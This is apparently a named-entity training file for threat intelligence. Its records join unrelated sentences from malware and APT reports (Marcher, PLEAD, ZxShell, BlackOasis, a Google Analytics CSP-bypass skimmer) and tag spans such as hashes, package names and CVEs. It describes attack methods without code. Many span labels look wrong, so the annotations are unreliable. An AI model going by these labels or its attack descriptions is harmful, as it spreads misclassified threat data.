Most fraudsters create one - time email addresses or use stolen email addresses , both of which are easy to create or obtain .", "spans": [{"start": 331, "end": 336, "label": "Malware"}, {"start": 478, "end": 482, "label": "Organization"}, {"start": 485, "end": 491, "label": "Organization"}, {"start": 494, "end": 506, "label": "Organization"}, {"start": 509, "end": 513, "label": "Organization"}, {"start": 516, "end": 522, "label": "Organization"}, {"start": 525, "end": 530, "label": "Organization"}, {"start": 537, "end": 543, "label": "Organization"}, {"start": 625, "end": 635, "label": "Organization"}]} {"text": "At different times , we have seen three or more active variants using different approaches or targeting different carriers . It targets organizations in Japan , South Korea , and Taiwan , leveling its attacks on public sector agencies and telecommunications and other high-technology industries . This configuration info can be changed with a tool included in the ZxShell package . TANKTRAP is a utility written in PowerShell that utilizes Windows group policy to spread and launch a wiper .", "spans": [{"start": 212, "end": 234, "label": "Organization"}, {"start": 239, "end": 257, "label": "Organization"}, {"start": 268, "end": 294, "label": "Organization"}, {"start": 364, "end": 371, "label": "Malware"}, {"start": 382, "end": 390, "label": "Malware"}, {"start": 404, "end": 489, "label": "Malware"}]} {"text": "Within each variant , the malicious code present in each sample may look nearly identical with only one evasion technique changed . In 2016 , for instance , we found their campaigns attacking Japanese organizations with various malware tools , notably the Elirks backdoor . In versions 3.22 and 3.39 the routine changes . 
None Organizations should apply the November 8 , 2022 patches for Exchange to prevent exploitation since the URL rewrite mitigations for ProxyNotShell are not effective against this exploit method .", "spans": [{"start": 256, "end": 271, "label": "System"}, {"start": 459, "end": 472, "label": "Vulnerability"}]} {"text": "Sample 1 may use AES-encrypted strings with reflection , while Sample 2 ( submitted on the same day ) will use the same code but with plaintext strings . Blackgear has been targeting various industries since its emergence a decade ago . The new xor encoding byte is 0x5B . As well as SysUpdate , the attackers used a number of legitimate or publicly available tools to map the network and dump credentials .", "spans": [{"start": 17, "end": 30, "label": "Organization"}, {"start": 284, "end": 293, "label": "Malware"}, {"start": 300, "end": 309, "label": "Organization"}, {"start": 327, "end": 365, "label": "System"}]} {"text": "At peak times of activity , we have seen up to 23 different apps from this family submitted to Play in one day . Blackgear 's campaigns also use email as an entry point , which is why it's important to secure the email gateway . The data is stored in the last 0x100 bytes of the file . Next , it sends a \u201c C_SC_NA_1 \u2013 single command \u201d to each hardcoded IOA to modify the state of the target station \u2019s IOA ( OFF or ON ) .", "spans": [{"start": 95, "end": 99, "label": "System"}]} {"text": "At other times , Bread appears to abandon hope of making a variant successful and we see a gap of a week or longer before the next variant . BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years . The first 8 bytes of data are static . 
On June 27 , 2023 , at 18:51:57 UTC , Mandiant identified a malicious Ruby script executed via the JumpCloud agent at a downstream customer ( a software solutions entity ) .", "spans": [{"start": 17, "end": 22, "label": "Malware"}, {"start": 195, "end": 200, "label": "Organization"}, {"start": 327, "end": 348, "label": "Malware"}, {"start": 366, "end": 381, "label": "Organization"}, {"start": 387, "end": 406, "label": "Organization"}, {"start": 411, "end": 436, "label": "Organization"}]} {"text": "This family showcases the amount of resources that malware authors now have to expend . Our research indicates that it has started targeting Japanese users . Then there is the dll install name , the domain , and the port . Talos discovered multiple vulnerabilities in Foxit PDF Reader that could allow an adversary to execute , arbitrary code on the targeted machine .", "spans": [{"start": 141, "end": 155, "label": "Organization"}, {"start": 176, "end": 179, "label": "System"}, {"start": 223, "end": 228, "label": "Organization"}, {"start": 268, "end": 284, "label": "System"}]} {"text": "Google Play Protect is constantly updating detection engines and warning users of malicious apps installed on their device . The malware tools used by BLACKGEAR can be categorized into three categories : binders , downloaders and backdoors . Knowing the obfuscation routines for this data we wrote a script to extract the URLs / IPs and ports stored . 
\u2022 Unauthorized network connections to MSSQL servers ( TCP/1433 ) and irregular or unauthorized authentication .", "spans": [{"start": 0, "end": 19, "label": "System"}, {"start": 204, "end": 211, "label": "System"}, {"start": 214, "end": 225, "label": "System"}, {"start": 230, "end": 239, "label": "System"}, {"start": 354, "end": 461, "label": "Indicator"}]} {"text": "SELECTED SAMPLES Package Name SHA-256 Digest com.rabbit.artcamera 18c277c7953983f45f2fe6ab4c7d872b2794c256604e43500045cb2b2084103f org.horoscope.astrology.predict 6f1a1dbeb5b28c80ddc51b77a83c7a27b045309c4f1bff48aaff7d79dfd4eb26 com.theforest.rotatemarswallpaper 4e78a26832a0d471922eb61231bc498463337fed8874db5f70b17dd06dcb9f09 Binders are delivered by attack vectors ( such as phishing and watering hole attacks ) onto a machine . The most common ports used are , 80, 1985, 1986, and 443 . 1985 is the default port for the malware , 1986 is the lazy variation of that port . For this year 's State of Malware report we asked : What do resource constrained organizations need to know in 2023 ?", "spans": [{"start": 45, "end": 65, "label": "Indicator"}, {"start": 66, "end": 130, "label": "Indicator"}, {"start": 131, "end": 162, "label": "Indicator"}, {"start": 163, "end": 227, "label": "Indicator"}, {"start": 228, "end": 261, "label": "Indicator"}, {"start": 262, "end": 326, "label": "Indicator"}, {"start": 327, "end": 334, "label": "System"}, {"start": 656, "end": 669, "label": "Organization"}]} {"text": "com.jspany.temp 0ce78efa764ce1e7fb92c4de351ec1113f3e2ca4b2932feef46d7d62d6ae87f5 com.hua.ru.quan 780936deb27be5dceea20a5489014236796a74cc967a12e36cb56d9b8df9bc86 com.rongnea.udonood 8b2271938c524dd1064e74717b82e48b778e49e26b5ac2dae8856555b5489131 Based on the mutexes and domain names of some of their C&C servers , BlackTech 's campaigns are likely designed to steal their target 's technology . Port 80 and 443 are the default ports for HTTP and HTTPS traffic . 
It crafts configurable IEC-104 Application Service Data Unit ( ASDU ) messages , to change the state of RTU Information Object Addresses ( IOAs ) to ON or OFF .", "spans": [{"start": 0, "end": 15, "label": "Indicator"}, {"start": 16, "end": 80, "label": "Indicator"}, {"start": 81, "end": 96, "label": "Indicator"}, {"start": 97, "end": 161, "label": "Indicator"}, {"start": 162, "end": 181, "label": "Indicator"}, {"start": 182, "end": 246, "label": "Indicator"}, {"start": 439, "end": 443, "label": "Indicator"}, {"start": 448, "end": 453, "label": "Indicator"}]} {"text": "com.mbv.a.wp 01611e16f573da2c9dbc7acdd445d84bae71fecf2927753e341d8a5652b89a68 com.pho.nec.sg b4822eeb71c83e4aab5ddfecfb58459e5c5e10d382a2364da1c42621f58e119b Exobot ( Marcher ) - Android banking Trojan on the rise February 2017 Introduction The past months many different banking Trojans for Following their activities and evolving tactics and techniques helped us uncover the proverbial red string of fate that connected three seemingly disparate campaigns : PLEAD , Shrouded Crossbow , and of late , Waterbear . The next most common is port 53 . The operation and the key are different throughout the strings so , the best option is to emulate this part to get the decoded strings .", "spans": [{"start": 0, "end": 12, "label": "Indicator"}, {"start": 13, "end": 77, "label": "Indicator"}, {"start": 78, "end": 92, "label": "Indicator"}, {"start": 93, "end": 157, "label": "Indicator"}, {"start": 158, "end": 164, "label": "Malware"}, {"start": 167, "end": 174, "label": "Malware"}, {"start": 179, "end": 186, "label": "System"}, {"start": 548, "end": 610, "label": "Malware"}]} {"text": "the Android platform have received media attention . Active since 2012 , it has so far targeted Taiwanese government agencies and private organizations . This is used in some of the newer 3.22 and 3.39 samples . 
In addition , more ransomware gangs are attacking targets multiple times a month : the number of groups carrying out more than one known attack per month in the UK has climbed steadily for a year , from just one in July 2022 to eight in June 2023 .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 106, "end": 125, "label": "Organization"}, {"start": 231, "end": 247, "label": "Organization"}, {"start": 270, "end": 292, "label": "Indicator"}, {"start": 316, "end": 365, "label": "Indicator"}, {"start": 424, "end": 458, "label": "Indicator"}]} {"text": "One of these , called Marcher ( aka Exobot ) , seems to be especially active with different samples appearing on a daily basis . PLEAD uses spear-phishing emails to deliver and install their backdoor , either as an attachment or through links to cloud storage services . After that , the count for each port starts declining sharply . A clever example was \u2018 Office Monkeys LOL Video.zip \u2019 .", "spans": [{"start": 22, "end": 29, "label": "Malware"}, {"start": 36, "end": 42, "label": "Malware"}, {"start": 246, "end": 268, "label": "System"}, {"start": 358, "end": 386, "label": "Indicator"}]} {"text": "This malware variant also appears to be technically superior to many other banking Trojans being able to use its overlay attack even on Android 6 , which has technical improvements compared to the previous Android versions to prevent such attacks . PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach . The choices are interesting though , many correspond to what looks like the birth year of the controller ( ie . years in the late 1980s and early 1990s ) , and others seem to match what year the malware was launched in ( ie . in the 2000s , relatively close to the current year ) . 
Mandiant assesses with high confidence that UNC4899 is a cryptocurrency - focused element within the DPRK 's Reconnaissance General Bureau ( RGB ) .", "spans": [{"start": 136, "end": 145, "label": "System"}, {"start": 206, "end": 213, "label": "System"}, {"start": 357, "end": 376, "label": "Vulnerability"}, {"start": 379, "end": 392, "label": "Vulnerability"}, {"start": 770, "end": 777, "label": "Organization"}]} {"text": "The main infection vector is a phishing attack using SMS/MMS . PLEAD also uses CVE-2017-7269 , a buffer overflow vulnerability Microsoft Internet Information Services ( IIS ) 6.0 to compromise the victim 's server . Since this malware dates back to around 2004 , there are many samples containing CNC URLs from the 3322.org page . The HyperText Transfer Protocol ( HTTP ) redirect status response code indicates that the resource requested has been temporarily moved to the URL given by the header .", "spans": [{"start": 79, "end": 92, "label": "Vulnerability"}, {"start": 297, "end": 300, "label": "System"}, {"start": 315, "end": 323, "label": "Indicator"}, {"start": 331, "end": 371, "label": "System"}, {"start": 412, "end": 497, "label": "Indicator"}]} {"text": "The social engineering message includes a link that leads to a fake version of a popular app , using names like Runtastic , WhatsApp or Netflix . This campaign , first observed in 2010 , is believed to be operated by a well-funded group given how it appeared to have purchased the source code of the BIFROST backdoor , which the operators enhanced and created other tools from . This page used to offer no-ip type hosting and was widely used by malware authors . 
A browser redirects to this page but search engines do n't update their links to the resource ( in ' SEO - speak ' , it is said that the ' link - juice ' is not sent to the new URL ) .", "spans": [{"start": 112, "end": 121, "label": "System"}, {"start": 124, "end": 132, "label": "System"}, {"start": 136, "end": 143, "label": "System"}, {"start": 465, "end": 472, "label": "System"}]} {"text": "On installation , the app requests the user to provide SMS storage access and high Android privileges such as Device Admin . Shrouded Crossbow targeted privatized agencies and government contractors as well as enterprises in the consumer electronics , computer , healthcare , and financial industries . So much so that Microsoft did a takedown in 2012 . It is therefore recommended to set the code only as a response for or methods and to use instead , as the method change is explicitly prohibited in that case .", "spans": [{"start": 83, "end": 90, "label": "System"}, {"start": 152, "end": 171, "label": "Organization"}, {"start": 176, "end": 198, "label": "Organization"}, {"start": 210, "end": 221, "label": "Organization"}, {"start": 229, "end": 249, "label": "Organization"}, {"start": 252, "end": 260, "label": "Organization"}, {"start": 263, "end": 273, "label": "Organization"}, {"start": 280, "end": 300, "label": "Organization"}, {"start": 319, "end": 328, "label": "Organization"}]} {"text": "Other infection vectors include pornographic websites serving apps called Adobe Flash or YouPorn . Shrouded Crossbow employs three BIFROST-derived backdoors : BIFROSE , KIVARS , and XBOW . A similar service , vicp.net , is also seen in many of the domains . 
CSP can define a list of domains that the browser should be allowed to interact with for the visited URL .", "spans": [{"start": 74, "end": 85, "label": "System"}, {"start": 89, "end": 96, "label": "System"}, {"start": 131, "end": 156, "label": "System"}, {"start": 159, "end": 166, "label": "System"}, {"start": 169, "end": 175, "label": "System"}, {"start": 182, "end": 186, "label": "System"}, {"start": 209, "end": 217, "label": "Indicator"}, {"start": 258, "end": 261, "label": "Organization"}, {"start": 300, "end": 307, "label": "System"}, {"start": 359, "end": 362, "label": "System"}]} {"text": "The Marcher banking malware uses two main attack vectors . Like PLEAD , Shrouded Crossbow uses spear-phishing emails with backdoor-laden attachments that utilize the RTLO technique and accompanied by decoy documents . In the malware , if a domain is configured , it will retrieve domain.tld / . Designed to guard against XSS attacks , CSP helps control which domains can be accessed as part of a page and therefore restricts which domains to share data with .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 166, "end": 180, "label": "System"}, {"start": 200, "end": 215, "label": "Malware"}, {"start": 280, "end": 290, "label": "Indicator"}, {"start": 321, "end": 332, "label": "Organization"}, {"start": 335, "end": 338, "label": "Organization"}]} {"text": "The first attack vector is to compromise the out of band authentication for online banks that rely on SMS using SMS forwarding . XBOW 's capabilities are derived from BIFROSE and KIVARS ; Shrouded Crossbow gets its name from its unique mutex format . txt . 
These restrictions are specified by a list of allowed URIs .", "spans": [{"start": 129, "end": 133, "label": "System"}, {"start": 167, "end": 174, "label": "System"}, {"start": 179, "end": 185, "label": "System"}, {"start": 251, "end": 254, "label": "Indicator"}, {"start": 303, "end": 315, "label": "System"}]} {"text": "The second attack vector , the overlay attack , shows a customized phishing window whenever a targeted application is started on the device . While PLEAD and KIVARS are most likely to be used in first phase attacks , Waterbear can be seen as a secondary backdoor installed after attackers have gained a certain level of privilege . This file contains a list of IP addresses for the infected machine to connect back to . By analyzing field data we see a gap in the implementation of CSP , and even for sites that do use it correctly , this creates an open window to exfiltrate data .", "spans": [{"start": 148, "end": 153, "label": "System"}, {"start": 158, "end": 164, "label": "System"}, {"start": 451, "end": 531, "label": "Vulnerability"}]} {"text": "The overlay window is often indistinguishable from the expected screen ( such as a login screen for a banking app ) and is used to steal the victim \u2019 s banking credentials . Recently , the JPCERT published a thorough analysis of the Plead backdoor , which , according to Trend Micro , is used by the cyberespionage group BlackTech . Otherwise , if an IP address is configured , it will connect directly to that IP address . 
Our demonstration shows how using the Google Analytics API , a web skimmer can send data to be collected in his own account instance .", "spans": [{"start": 189, "end": 195, "label": "Organization"}, {"start": 233, "end": 247, "label": "System"}, {"start": 271, "end": 282, "label": "Organization"}, {"start": 462, "end": 482, "label": "System"}, {"start": 485, "end": 498, "label": "Organization"}]} {"text": "The target list and bank specific fake login pages can be dynamically updated via their C2 panel ( dashboard back-end ) which significantly increases the adaptability and scalability of this attack . Despite the fact that the Changing Information Technology Inc. certificate was revoked on July 4 , 2017 , the BlackTech group is still using it to sign their malicious tools . We have written a simple C++ ZxShell Server that implements the communication and the handshake for the version 3.10 and 3.20 of the ZxShell DLL . As Google Analytics is allowed in the CSP configuration of many major sites , this demo shows how an attacker can bypass this security protection and steal data .", "spans": [{"start": 405, "end": 412, "label": "Malware"}, {"start": 509, "end": 516, "label": "Malware"}, {"start": 517, "end": 520, "label": "System"}, {"start": 526, "end": 542, "label": "Organization"}, {"start": 561, "end": 564, "label": "Organization"}, {"start": 624, "end": 632, "label": "Organization"}]} {"text": "In addition , this type of Android banking malware does not require the device to be rooted or the app to have any specific Android permission ( besides android.permission.INTERNET to retrieve the overlay contents and send its captured data ) . The BlackTech group is primarily focused on cyberespionage in Asia . The implementation is quite simple : After the handshake , 2 threads that deal with data transfer are spawned . 
Our gathered field data shows the following statistics on CSP usage across the Internet ( based on HTTPArchive March 2020 scan ):", "spans": [{"start": 27, "end": 34, "label": "System"}, {"start": 124, "end": 131, "label": "System"}, {"start": 153, "end": 180, "label": "Indicator"}, {"start": 484, "end": 487, "label": "Organization"}]} {"text": "The many changes we see in the way the attacks are performed show that attackers are heavily experimenting to find the best way of infecting a mobile device and abusing existing functionality to perform successful phishing attacks . The new activity described in this blogpost was detected by ESET in Taiwan , where the Plead malware has always been most actively deployed . Advanced persistent threats will remain a problem for companies and organizations of all sizes , especially those with high financial or intellectual property value . We took google - analytics as an example , but other services can also be used .", "spans": [{"start": 293, "end": 297, "label": "Organization"}, {"start": 320, "end": 333, "label": "System"}, {"start": 550, "end": 568, "label": "System"}]} {"text": "The next stage in device infection could be the use of exploit kits and malvertising , which would be quite effective due the many Android vulnerabilities and consumers with unpatched devices . Attackers are targeting Windows platform and aiming at government institutions as well as big companies in Colombia . Group 72 \u2019s involvement in Operation SMN is another example of what sort of damage that can be done if organizations are not diligent in their efforts to secure their networks . 
As an example , we took the twitter login page , which implemented the following CSP rule ( which contains ): The following short JS code inserted into the site will send the credentials to google - analytics console controlled by us : The UA-#######- # parameter is the tag ID owner that Google Analytics uses to connect the data to a specific account .", "spans": [{"start": 131, "end": 154, "label": "Vulnerability"}, {"start": 174, "end": 191, "label": "Vulnerability"}, {"start": 249, "end": 272, "label": "Organization"}, {"start": 312, "end": 320, "label": "Organization"}, {"start": 518, "end": 525, "label": "System"}, {"start": 571, "end": 574, "label": "Organization"}]} {"text": "In addition future Trojans could leverage root exploits to make them almost impossible to remove and give malicious actors the ability to hook generic low level API \u2019 s that are used by all ( banking ) applications , just like the attack vector as has been used on the desktop platform for years . Attackers like to use spear-fishing email with password protected RAR attachment to avoid being detected by the email gateway . ZxShell is one sample amongst several tools that Group 72 used within their campaign . Though Google meant to have this parameter be used to mention the page the user visited , we used it to exfiltrate the user name and password data encoded in base64 .", "spans": [{"start": 364, "end": 367, "label": "System"}, {"start": 426, "end": 433, "label": "Malware"}, {"start": 475, "end": 483, "label": "Organization"}]} {"text": "Technical Analysis Permissions Marcher \u2019 s APK size is fairly small ( only 683KB for sample eb8f02fc30ec49e4af1560e54b53d1a7 ) , much smaller than most legitimate apps and other popular mobile malware samples . The first sample being captured was in April 2018 and since that we observed a lot more related ones . ZxShell is a sophisticated tool employed by Group 72 that contains all kinds of functionality . 
In our Google Analytics platform , we will see the data as : In our demo the DP will result in page view of Which will be decoded from base64 as : The source of the problem is that the CSP rule system is n\u2019t granular enough .", "spans": [{"start": 31, "end": 38, "label": "Malware"}, {"start": 92, "end": 124, "label": "Indicator"}, {"start": 314, "end": 321, "label": "Malware"}, {"start": 358, "end": 366, "label": "Organization"}, {"start": 417, "end": 442, "label": "System"}, {"start": 532, "end": 551, "label": "Indicator"}, {"start": 595, "end": 598, "label": "Organization"}]} {"text": "This sample only includes Dalvik bytecode and resources without any native libraries . After performing investigations on the classified victims , we find the attacker targets big companies and government agencies in Colombia . Its detection and removal can be difficult due to the various techniques used to conceal its presence , such as disabling the host anti-virus , masking its installation on a system with a valid service name , and by masking outbound traffic as originating from a web browser . Recognizing and stopping the above malicious JavaScript request requires advanced visibility solutions that can detect the access and exfiltration of sensitive user data ( in this case the user \u2019s email address and password ) .", "spans": [{"start": 194, "end": 213, "label": "Organization"}, {"start": 540, "end": 568, "label": "Malware"}]} {"text": "The package name ( vyn.hhsdzgvoexobmkygffzwuewrbikzud ) and its many activities and services have randomized names , probably to make it a bit more difficult to detect the package using blacklisting . After monitoring and correlating the APT attack , 360 Threat Intelligence Center discovered multiple related emails to attack Colombian government agencies , financial institutions and large enterprises . 
While other techniques are also utilized to conceal and inhibit its removal , ZxShell \u2019s primary functionality is to act as a Remote Administration Tool ( RAT ) , allowing the threat actor to have continuous backdoor access on to the compromised machine . The problem is that CSP does n't support query strings ( See Spec ):", "spans": [{"start": 19, "end": 53, "label": "Indicator"}, {"start": 251, "end": 281, "label": "Organization"}, {"start": 337, "end": 356, "label": "Organization"}, {"start": 359, "end": 381, "label": "Organization"}, {"start": 392, "end": 403, "label": "Organization"}, {"start": 484, "end": 491, "label": "Malware"}, {"start": 532, "end": 558, "label": "System"}, {"start": 561, "end": 564, "label": "System"}, {"start": 614, "end": 622, "label": "Malware"}, {"start": 682, "end": 716, "label": "Vulnerability"}]} {"text": "The set of permissions required by Marcher according to the manifest is as follows : \u2217 android.permission.CHANGE_NETWORK_STATE ( change network connectivity state ) \u2217 android.permission.SEND_SMS ( send SMS messages ) \u2217 android.permission.USES_POLICY_FORCE_LOCK ( lock the device ) \u2217 android.permission.RECEIVE_BOOT_COMPLETED ( start malware when device boots ) \u2217 android.permission.INTERNET ( communicate with the internet ) \u2217 android.permission.VIBRATE The oldest sample we've seen up to now is from November 2013 . As our analysis demonstrates , ZxShell is an effective tool that can be ultimately used to steal user credentials and other highly valuable information . 
Having such a gap with the most commonly used domain allowed with CSP is a major risk indicator of the threats that can come from other domains that are used to serve multiple accounts .", "spans": [{"start": 35, "end": 42, "label": "Malware"}, {"start": 87, "end": 126, "label": "Indicator"}, {"start": 167, "end": 194, "label": "Indicator"}, {"start": 219, "end": 260, "label": "Indicator"}, {"start": 283, "end": 324, "label": "Indicator"}, {"start": 363, "end": 390, "label": "Indicator"}, {"start": 427, "end": 453, "label": "Indicator"}, {"start": 548, "end": 555, "label": "Malware"}, {"start": 757, "end": 855, "label": "Indicator"}]} {"text": "( control the vibrator ) \u2217 android.permission.ACCESS_WIFI_STATE ( view information about the status of Wi-Fi ) \u2217 android.permission.WRITE_SMS ( edit/delete SMS ) \u2217 android.permission.ACCESS_NETWORK_STATE ( view the status of all networks ) \u2217 android.permission.WAKE_LOCK ( prevent the phone from going to sleep ) \u2217 android.permission.GET_TASKS ( retrieve running applications ) \u2217 android.permission.CALL_PHONE ( call phone numbers ) One of the top targets is the Japan Pension Service , but the list of targeted industries includes government and government agencies , local governments , public interest groups , universities , banks , financial services , energy and so on . The threat posed by ZxShell to organizations is one that cannot be ignored . 
A possible solution would come from adaptive URLs , adding the ID as part of the URL or subdomain to allow admins to set CSP rules that restrict data exfiltration to other accounts .", "spans": [{"start": 27, "end": 63, "label": "Indicator"}, {"start": 113, "end": 141, "label": "Indicator"}, {"start": 164, "end": 203, "label": "Indicator"}, {"start": 242, "end": 270, "label": "Indicator"}, {"start": 315, "end": 343, "label": "Indicator"}, {"start": 380, "end": 409, "label": "Indicator"}, {"start": 469, "end": 484, "label": "Organization"}, {"start": 532, "end": 542, "label": "Organization"}, {"start": 547, "end": 566, "label": "Organization"}, {"start": 569, "end": 586, "label": "Organization"}, {"start": 589, "end": 611, "label": "Organization"}, {"start": 614, "end": 626, "label": "Organization"}, {"start": 629, "end": 634, "label": "Organization"}, {"start": 637, "end": 655, "label": "Organization"}, {"start": 658, "end": 664, "label": "Organization"}, {"start": 697, "end": 704, "label": "Malware"}]} {"text": "\u2217 android.permission.WRITE_SETTINGS ( read/write global system settings ) \u2217 android.permission.RECEIVE_SMS ( intercept SMS messages ) \u2217 android.permission.READ_PHONE_STATE ( read phone details of the device such as phone number and serial number ) \u2217 android.permission.CHANGE_WIFI_STATE ( connect to and disconnect from Wi-Fi networks and make changes to configured networks ) \u2217 android.permission.READ_CONTACTS ( read all contact data ) * android.permission.READ_SMS However , the attack is different in two respects : unlike other APTs , the main focus of Blue Termite is to attack Japanese organizations ; and most of their C2s are located in Japan . Organizations with high financial or intellectual property value should take the time to ensure their security requirements are met and that employee \u2019s are educated about the security threats their organizations face . 
In addition to the complexity of managing CSP rules , this vulnerability shows how widely used services such as Google Analytics can be subverted to bypass this protection .", "spans": [{"start": 2, "end": 35, "label": "Indicator"}, {"start": 76, "end": 106, "label": "Indicator"}, {"start": 136, "end": 171, "label": "Indicator"}, {"start": 250, "end": 286, "label": "Indicator"}, {"start": 379, "end": 411, "label": "Indicator"}, {"start": 440, "end": 467, "label": "Indicator"}, {"start": 558, "end": 570, "label": "System"}, {"start": 986, "end": 1002, "label": "System"}]} {"text": "( read SMS messages ) Obviously a fairly significant list of permissions of which many are suspicious , especially when combined . Originally , the main infection vector of Blue Termite was spear-phishing emails . Threat Spotlight : Group 72 , Opening the ZxShell . Adversaries may communicate using a protocol and port pairing that are typically not associated .", "spans": [{"start": 173, "end": 185, "label": "System"}, {"start": 233, "end": 241, "label": "Organization"}, {"start": 256, "end": 263, "label": "Malware"}, {"start": 266, "end": 277, "label": "Organization"}]} {"text": "Runtastic sample permission prompt Runtastic sample permission prompt Checking foreground app Marcher is one of the few Android banking Trojans to use the AndroidProcesses library , which enables the application to obtain the name of the Android package that is currently running in the foreground . Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit ( CVE-2015-5119 , the one leaked from The Hacking Team incident ) . A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . 
For example , HTTPS over port 8088[1 ] or port 587[2 ] as opposed to the traditional port 443 .", "spans": [{"start": 0, "end": 9, "label": "System"}, {"start": 35, "end": 44, "label": "System"}, {"start": 94, "end": 101, "label": "Malware"}, {"start": 238, "end": 245, "label": "System"}, {"start": 300, "end": 313, "label": "Organization"}, {"start": 396, "end": 409, "label": "Vulnerability"}, {"start": 412, "end": 425, "label": "Vulnerability"}, {"start": 583, "end": 591, "label": "Vulnerability"}, {"start": 666, "end": 673, "label": "Malware"}, {"start": 725, "end": 736, "label": "Organization"}, {"start": 753, "end": 832, "label": "Indicator"}]} {"text": "This library is used because it uses the only ( publicly known ) way to retrieve this information on Android 6 ( using the process OOM score read from the /proc directory ) . Kaspersky Lab also found some watering hole attacks , including one on a website belonging to a prominent member of the Japanese government . The incident , as described by security researchers with Moscow-based cybersecurity firm Kaspersky Lab , shines a rare light on the opaque although apparently vibrant market for software exploits and spyware , which in this case appears to have been purchased by a nation-state . Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis / parsing of network data .", "spans": [{"start": 101, "end": 110, "label": "System"}, {"start": 175, "end": 188, "label": "Organization"}, {"start": 406, "end": 419, "label": "Organization"}, {"start": 517, "end": 524, "label": "Malware"}, {"start": 597, "end": 608, "label": "Organization"}]} {"text": "When the current app on the foreground matches with an app targeted by the malware , the Trojan will show the corresponding phishing overlay , making the user think it is the app that was just started . 
In early July 2015 , however , Kaspersky Lab found a sample that creates a decryption key with Salt1 , Salt2 , and Salt3 . The Middle Eastern hacker group in this case is codenamed \u201c BlackOasis . \u201d Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \u201c FinSpy \u201d malware , according to a new blog post published Monday . Adversaries may also make changes to victim systems to abuse non - standard ports .", "spans": [{"start": 234, "end": 247, "label": "Organization"}, {"start": 386, "end": 396, "label": "Organization"}, {"start": 401, "end": 410, "label": "Organization"}, {"start": 444, "end": 462, "label": "System"}, {"start": 463, "end": 471, "label": "Vulnerability"}, {"start": 488, "end": 501, "label": "Vulnerability"}, {"start": 548, "end": 554, "label": "Malware"}, {"start": 615, "end": 626, "label": "Organization"}]} {"text": "Dynamic overlays When victims open up a targeted app , Marcher smoothly displays an overlay , a customized WebView , looks in its application preferences ( main_prefs.xml ) and decides which specified URL is needed for the targeted app . From early June , when the cyber-attack on the Japan Pension Service started to be reported widely , various Japanese organizations would have started to deploy protection measures . Adobe issued a fix Monday to its users in the form of a software update . For example , Registry keys and other configuration settings can be used to modify protocol and port pairings.[3 ] APT - C-36 has used port 4050 for C2 communications.[4 ]", "spans": [{"start": 55, "end": 62, "label": "Malware"}, {"start": 291, "end": 306, "label": "Organization"}, {"start": 421, "end": 426, "label": "Organization"}, {"start": 610, "end": 620, "label": "Organization"}, {"start": 625, "end": 664, "label": "Indicator"}]} {"text": "The complete list of apps can be seen below . 
It employs AES in addition to SID tricks , making it difficult to decrypt sensitive data . FinSpy , a final-stage payload that allows for an attacker to covertly learn what a target is talking about and who they are communicating with , is associated with Gamma Group \u2014 which goes by other names , including FinFisher and Lench IT Solutions . An APT32 backdoor can use HTTP over a non - standard TCP port ( e.g 14146 ) which is specified in the backdoor configuration.[5 ]", "spans": [{"start": 57, "end": 60, "label": "System"}, {"start": 76, "end": 79, "label": "System"}, {"start": 137, "end": 143, "label": "Malware"}, {"start": 302, "end": 313, "label": "Organization"}, {"start": 354, "end": 363, "label": "Organization"}, {"start": 368, "end": 386, "label": "Organization"}, {"start": 392, "end": 406, "label": "Malware"}, {"start": 411, "end": 516, "label": "Indicator"}]} {"text": "The phishing pages shown in the overlay use Ajax calls to communicate with a PHP back-end which stores all user input . In order to fight back against this cyber-espionage , Kaspersky Lab will continue its research . BlackOasis in recent months sent a wave of phishing emails . APT33 has used HTTP over TCP ports 808 and 880 for command and control.[1 ]", "spans": [{"start": 174, "end": 187, "label": "Organization"}, {"start": 217, "end": 227, "label": "Organization"}, {"start": 269, "end": 275, "label": "System"}, {"start": 278, "end": 283, "label": "Organization"}, {"start": 288, "end": 351, "label": "Indicator"}]} {"text": "The C2 backend url looks like this : https : //evilhost/c2folder/njs2/ ? Bookworm 's functional code is radically different from PlugX and has a rather unique modular architecture that warranted additional analysis by Unit 42 . These emails contained malicious Microsoft Word documents with the aforementioned Flash Player zero-day hidden inside an embedded ActiveX object . 
BADCALL communicates on ports 443 and 8000 with a FakeTLS method.[6 ] Bankshot binds and listens on port 1058 for HTTP traffic while also utilizing a FakeTLS method.[7 ] BendyBear has used a custom RC4 and XOR encrypted protocol over port 443 for C2.[8 ]", "spans": [{"start": 37, "end": 72, "label": "Indicator"}, {"start": 73, "end": 81, "label": "System"}, {"start": 129, "end": 134, "label": "System"}, {"start": 218, "end": 225, "label": "Organization"}, {"start": 234, "end": 240, "label": "System"}, {"start": 261, "end": 285, "label": "System"}, {"start": 310, "end": 331, "label": "Vulnerability"}, {"start": 358, "end": 372, "label": "System"}, {"start": 375, "end": 382, "label": "Malware"}, {"start": 383, "end": 417, "label": "Indicator"}, {"start": 445, "end": 453, "label": "Malware"}, {"start": 454, "end": 501, "label": "Indicator"}, {"start": 545, "end": 554, "label": "Malware"}, {"start": 559, "end": 627, "label": "Indicator"}]} {"text": "fields [ ] . Bookworm has little malicious functionality built-in , with its only core ability involving stealing keystrokes and clipboard contents . In the past , BlackOasis messages were designed to appear like news articles from 2016 about political relations between Angola and China . During C0018 , the threat actors opened a variety of ports , including ports 28035 , 32467 , 41578 , and 46892 , to establish RDP connections.[9 ]", "spans": [{"start": 13, "end": 21, "label": "System"}, {"start": 164, "end": 174, "label": "Organization"}, {"start": 309, "end": 322, "label": "Organization"}, {"start": 351, "end": 434, "label": "Indicator"}]} {"text": "There is no way to access the original app again even if victims terminate the overlay process and reopen app , until credit card ( name , number , expiry date , security code ) and/or bank information ( PIN , VBV passcode , date of birth , etc . The Plead malware is a backdoor which , according to Trend Micro , is used by the BlackTech group in targeted attacks . 
